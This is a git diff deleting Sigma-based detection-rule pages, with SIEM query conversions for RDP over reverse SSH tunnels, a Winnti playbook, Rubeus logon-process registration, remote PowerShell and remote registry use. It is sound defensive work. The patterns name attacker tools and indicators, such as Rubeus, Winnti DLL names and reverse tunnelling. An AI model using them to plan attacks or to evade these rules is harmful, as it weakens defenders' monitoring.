-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5156\" AND ((winlog.event_data.SourcePort:\"3389\" AND DestinationAddress.keyword:(127.* OR \\:\\:1)) OR (winlog.event_data.DestinationPort:\"3389\" AND SourceAddress.keyword:(127.* OR \\:\\:1))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'RDP over Reverse SSH Tunnel WFP'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5156" AND ((SourcePort:"3389" AND DestinationAddress.keyword:(127.* \:\:1)) OR (DestinationPort:"3389" AND SourceAddress.keyword:(127.* \:\:1))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5156" ((SourcePort="3389" (DestinationAddress="127.*" OR DestinationAddress="::1")) OR (DestinationPort="3389" (SourceAddress="127.*" OR SourceAddress="::1"))))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5156" ((SourcePort="3389" DestinationAddress IN ["127.*", "::1"]) OR (DestinationPort="3389" SourceAddress IN ["127.*", "::1"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5156)(?=.*(?:.*(?:.*(?:.*(?=.*3389)(?=.*(?:.*127\..*|.*::1)))|.*(?:.*(?=.*3389)(?=.*(?:.*127\..*|.*::1)))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_redmimicry_winnti_proc.md b/Atomic_Threat_Coverage/Detection_Rules/win_redmimicry_winnti_proc.md
deleted file mode 100644
index 0732c4a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_redmimicry_winnti_proc.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | RedMimicry Winnti Playbook Execute       |
-|:-------------------------|:------------------|
-| **Description**          | Detects actions caused by the RedMimicry Winnti playbook |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1106: Native API](https://attack.mitre.org/techniques/T1106)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1106: Native API](../Triggers/T1106.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://redmimicry.com](https://redmimicry.com)</li></ul>  |
-| **Author**               | Alexander Rausch |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: RedMimicry Winnti Playbook Execute
-id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b
-description: Detects actions caused by the RedMimicry Winnti playbook
-references:
-    - https://redmimicry.com
-author: Alexander Rausch
-date: 2020/06/24
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.t1106
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        Image|contains:
-            - rundll32.exe
-            - cmd.exe
-        CommandLine|contains:
-            - gthread-3.6.dll
-            - \Windows\Temp\tmp.bat
-            - sigcmm-2.4.dll
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*rundll32.exe.*" -or $_.message -match "Image.*.*cmd.exe.*") -and ($_.message -match "CommandLine.*.*gthread-3.6.dll.*" -or $_.message -match "CommandLine.*.*\\Windows\\Temp\\tmp.bat.*" -or $_.message -match "CommandLine.*.*sigcmm-2.4.dll.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*rundll32.exe* OR *cmd.exe*) AND winlog.event_data.CommandLine.keyword:(*gthread\-3.6.dll* OR *\\Windows\\Temp\\tmp.bat* OR *sigcmm\-2.4.dll*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/95022b85-ff2a-49fa-939a-d7b8f56eeb9b <<EOF
-{
-  "metadata": {
-    "title": "RedMimicry Winnti Playbook Execute",
-    "description": "Detects actions caused by the RedMimicry Winnti playbook",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1106"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*rundll32.exe* OR *cmd.exe*) AND winlog.event_data.CommandLine.keyword:(*gthread\\-3.6.dll* OR *\\\\Windows\\\\Temp\\\\tmp.bat* OR *sigcmm\\-2.4.dll*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*rundll32.exe* OR *cmd.exe*) AND winlog.event_data.CommandLine.keyword:(*gthread\\-3.6.dll* OR *\\\\Windows\\\\Temp\\\\tmp.bat* OR *sigcmm\\-2.4.dll*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'RedMimicry Winnti Playbook Execute'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*rundll32.exe* *cmd.exe*) AND CommandLine.keyword:(*gthread\-3.6.dll* *\\Windows\\Temp\\tmp.bat* *sigcmm\-2.4.dll*))
-```
-
-
-### splunk
-    
-```
-((Image="*rundll32.exe*" OR Image="*cmd.exe*") (CommandLine="*gthread-3.6.dll*" OR CommandLine="*\\Windows\\Temp\\tmp.bat*" OR CommandLine="*sigcmm-2.4.dll*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*rundll32.exe*", "*cmd.exe*"] CommandLine IN ["*gthread-3.6.dll*", "*\\Windows\\Temp\\tmp.bat*", "*sigcmm-2.4.dll*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*rundll32\.exe.*|.*.*cmd\.exe.*))(?=.*(?:.*.*gthread-3\.6\.dll.*|.*.*\Windows\Temp\tmp\.bat.*|.*.*sigcmm-2\.4\.dll.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_register_new_logon_process_by_rubeus.md b/Atomic_Threat_Coverage/Detection_Rules/win_register_new_logon_process_by_rubeus.md
deleted file mode 100644
index da1a083..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_register_new_logon_process_by_rubeus.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Register new Logon Process by Rubeus       |
-|:-------------------------|:------------------|
-| **Description**          | Detects potential use of Rubeus via registered new trusted logon process |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)</li></ul>  |
-| **Author**               | Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community |
-| Other Tags           | <ul><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Register new Logon Process by Rubeus
-id: 12e6d621-194f-4f59-90cc-1959e21e69f7
-description: Detects potential use of Rubeus via registered new trusted logon process
-status: experimental
-references:
-    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
-tags:
-    - attack.lateral_movement
-    - attack.privilege_escalation
-    - attack.t1208
-    - attack.t1558.003
-author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
-date: 2019/10/24
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        - EventID: 4611
-          LogonProcessName: 'User32LogonProcesss'
-    condition: selection
-falsepositives:
-    - Unkown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4611" -and $_.message -match "LogonProcessName.*User32LogonProcesss") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4611" AND winlog.event_data.LogonProcessName:"User32LogonProcesss")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/12e6d621-194f-4f59-90cc-1959e21e69f7 <<EOF
-{
-  "metadata": {
-    "title": "Register new Logon Process by Rubeus",
-    "description": "Detects potential use of Rubeus via registered new trusted logon process",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.privilege_escalation",
-      "attack.t1208",
-      "attack.t1558.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4611\" AND winlog.event_data.LogonProcessName:\"User32LogonProcesss\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4611\" AND winlog.event_data.LogonProcessName:\"User32LogonProcesss\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Register new Logon Process by Rubeus'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4611" AND LogonProcessName:"User32LogonProcesss")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4611" LogonProcessName="User32LogonProcesss")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4611" logon_process="User32LogonProcesss")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4611)(?=.*User32LogonProcesss))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session.md b/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session.md
deleted file mode 100644
index 009deb8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Remote PowerShell Sessions       |
-|:-------------------------|:------------------|
-| **Description**          | Detects basic PowerShell Remoting by monitoring for network inbound connections to ports 5985 OR 5986 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate use of remote PowerShell execution</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote PowerShell Sessions
-id: 13acf386-b8c6-4fe0-9a6e-c4756b974698
-description: Detects basic PowerShell Remoting by monitoring for network inbound connections to ports 5985 OR 5986
-status: experimental
-date: 2019/09/12
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5156
-        DestPort:
-            - 5985
-            - 5986
-        LayerRTID: 44
-    condition: selection
-falsepositives:
-    - Legitimate use of remote PowerShell execution
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5156" -and ($_.message -match "5985" -or $_.message -match "5986") -and $_.message -match "LayerRTID.*44") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5156" AND DestPort:("5985" OR "5986") AND LayerRTID:"44")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/13acf386-b8c6-4fe0-9a6e-c4756b974698 <<EOF
-{
-  "metadata": {
-    "title": "Remote PowerShell Sessions",
-    "description": "Detects basic PowerShell Remoting by monitoring for network inbound connections to ports 5985 OR 5986",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5156\" AND DestPort:(\"5985\" OR \"5986\") AND LayerRTID:\"44\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5156\" AND DestPort:(\"5985\" OR \"5986\") AND LayerRTID:\"44\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote PowerShell Sessions'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5156" AND DestPort:("5985" "5986") AND LayerRTID:"44")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5156" (DestPort="5985" OR DestPort="5986") LayerRTID="44")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5156" DestPort IN ["5985", "5986"] LayerRTID="44")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5156)(?=.*(?:.*5985|.*5986))(?=.*44))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session_process.md b/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session_process.md
deleted file mode 100644
index 2c9bdfa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_remote_powershell_session_process.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Remote PowerShell Session       |
-|:-------------------------|:------------------|
-| **Description**          | Detects remote PowerShell sections by monitoring for wsmprovhost as a parent or child process (sign of an active ps remote session) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate usage of remote Powershell, e.g. for monitoring purposes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote PowerShell Session
-id: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8
-description: Detects remote PowerShell sections by monitoring for wsmprovhost as a parent or child process (sign of an active ps remote session)
-status: experimental
-date: 2019/09/12
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        - Image|endswith: '\wsmprovhost.exe'
-        - ParentImage|endswith: '\wsmprovhost.exe'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Legitimate usage of remote Powershell, e.g. for monitoring purposes
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "Image.*.*\\wsmprovhost.exe" -or $_.message -match "ParentImage.*.*\\wsmprovhost.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\wsmprovhost.exe OR winlog.event_data.ParentImage.keyword:*\\wsmprovhost.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 <<EOF
-{
-  "metadata": {
-    "title": "Remote PowerShell Session",
-    "description": "Detects remote PowerShell sections by monitoring for wsmprovhost as a parent or child process (sign of an active ps remote session)",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\wsmprovhost.exe OR winlog.event_data.ParentImage.keyword:*\\\\wsmprovhost.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\wsmprovhost.exe OR winlog.event_data.ParentImage.keyword:*\\\\wsmprovhost.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote PowerShell Session'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\wsmprovhost.exe OR ParentImage.keyword:*\\wsmprovhost.exe)
-```
-
-
-### splunk
-    
-```
-(Image="*\\wsmprovhost.exe" OR ParentImage="*\\wsmprovhost.exe") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\wsmprovhost.exe" OR ParentImage="*\\wsmprovhost.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\wsmprovhost\.exe|.*.*\wsmprovhost\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_remote_registry_management_using_reg_utility.md b/Atomic_Threat_Coverage/Detection_Rules/win_remote_registry_management_using_reg_utility.md
deleted file mode 100644
index bbc8eba..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_remote_registry_management_using_reg_utility.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Remote Registry Management Using Reg Utility       |
-|:-------------------------|:------------------|
-| **Description**          | Remote registry management using REG utility from non-admin workstation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li><li>[T1012: Query Registry](https://attack.mitre.org/techniques/T1012)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li><li>[T1012: Query Registry](../Triggers/T1012.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate usage of remote registry management by administrator</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-| Other Tags           | <ul><li>attack.s0075</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote Registry Management Using Reg Utility
-id: 68fcba0d-73a5-475e-a915-e8b4c576827e
-description: Remote registry management using REG utility from non-admin workstation
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/10/22
-modified: 2019/11/13
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.defense_evasion
-    - attack.discovery
-    - attack.t1112
-    - attack.t1012
-    - attack.s0075
-logsource:
-    product: windows
-    service: security
-detection:
-    selection_1:
-        EventID: 5145
-        RelativeTargetName|contains: '\winreg'
-    selection_2:
-        IpAddress: '%Admins_Workstations%'
-    condition: selection_1 and not selection_2
-falsepositives:
-    - Legitimate usage of remote registry management by administrator
-level: medium
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5145" -and $_.message -match "RelativeTargetName.*.*\\winreg.*") -and  -not ($_.message -match "IpAddress.*%Admins_Workstations%")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"5145" AND RelativeTargetName.keyword:*\\winreg*) AND (NOT (winlog.event_data.IpAddress:"%Admins_Workstations%")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/68fcba0d-73a5-475e-a915-e8b4c576827e <<EOF
-{
-  "metadata": {
-    "title": "Remote Registry Management Using Reg Utility",
-    "description": "Remote registry management using REG utility from non-admin workstation",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.discovery",
-      "attack.t1112",
-      "attack.t1012",
-      "attack.s0075"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND RelativeTargetName.keyword:*\\\\winreg*) AND (NOT (winlog.event_data.IpAddress:\"%Admins_Workstations%\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND RelativeTargetName.keyword:*\\\\winreg*) AND (NOT (winlog.event_data.IpAddress:\"%Admins_Workstations%\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote Registry Management Using Reg Utility'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5145" AND RelativeTargetName.keyword:*\\winreg*) AND (NOT (IpAddress:"%Admins_Workstations%")))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5145" RelativeTargetName="*\\winreg*") NOT (IpAddress="%Admins_Workstations%"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="5145" RelativeTargetName="*\\winreg*")  -(IpAddress="%Admins_Workstations%"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*5145)(?=.*.*\winreg.*)))(?=.*(?!.*(?:.*(?=.*%Admins_Workstations%)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_remote_time_discovery.md b/Atomic_Threat_Coverage/Detection_Rules/win_remote_time_discovery.md
deleted file mode 100644
index 99986b7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_remote_time_discovery.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Discovery of a System Time       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
